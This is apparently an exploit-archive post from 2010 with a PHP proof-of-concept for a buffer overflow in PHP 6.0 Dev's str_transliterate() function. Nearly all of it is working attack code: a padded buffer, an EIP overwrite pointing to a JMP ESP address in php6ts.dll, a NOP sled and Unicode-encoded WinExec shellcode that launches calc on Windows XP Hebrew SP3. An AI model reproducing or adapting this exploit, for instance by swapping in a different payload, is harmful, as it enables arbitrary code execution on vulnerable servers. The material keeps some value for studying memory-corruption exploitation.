PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
Posted on 04 April 2010
============================================================ PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit ============================================================ <?php error_reporting(0); ##################################################################### ## PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit ## Tested on WIN XP HEB SP3, Apache, PHP 6.0 Dev ## Buffer Overflow ## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com<mailto:pr0t3ct10n@gmail.com>> ## Exploited by TheLeader, Debug ## SP. Thanks: HDM ## http://www.nullbyte.org.il ##################################################################### ## This code should exploits a buffer overflow in the str_transliterate() function to call WinExec and execute CALC ## Take a look, 'unicode.semantics' has to be on! ## php.ini > unicode.semantics = on ##################################################################### if(ini_get_bool('unicode.semantics')) { $buff = str_repeat("u4141", 256); $eip = "u1445u10A9"; # 0x10A91445 JMP ESP @ php6ts.dll $nops = str_repeat("u9090", 20); # WinExec Calc XP SP3 HEB Unicode-encoded shellcode $shellcode = "u02EBu05EBuF9E8uFFFFu33FFu5BC0u4388u8315u11C3uBB53u250Du7C86uD3FFu6163u636Cu414E"; $exploit = $buff.$eip.$nops.$shellcode; str_transliterate(0, $exploit, 0); } else { exit("Error! 'unicode.semantics' has be on! "); } function ini_get_bool($a) { $b = ini_get($a); switch (strtolower($b)) { case 'on': case 'yes': case 'true': return 'assert.active' !== $a; case 'stdout': case 'stderr': return 'display_errors' === $a; default: return (bool) (int) $b; } } ?> # Inj3ct0r.com [2010-04-04]
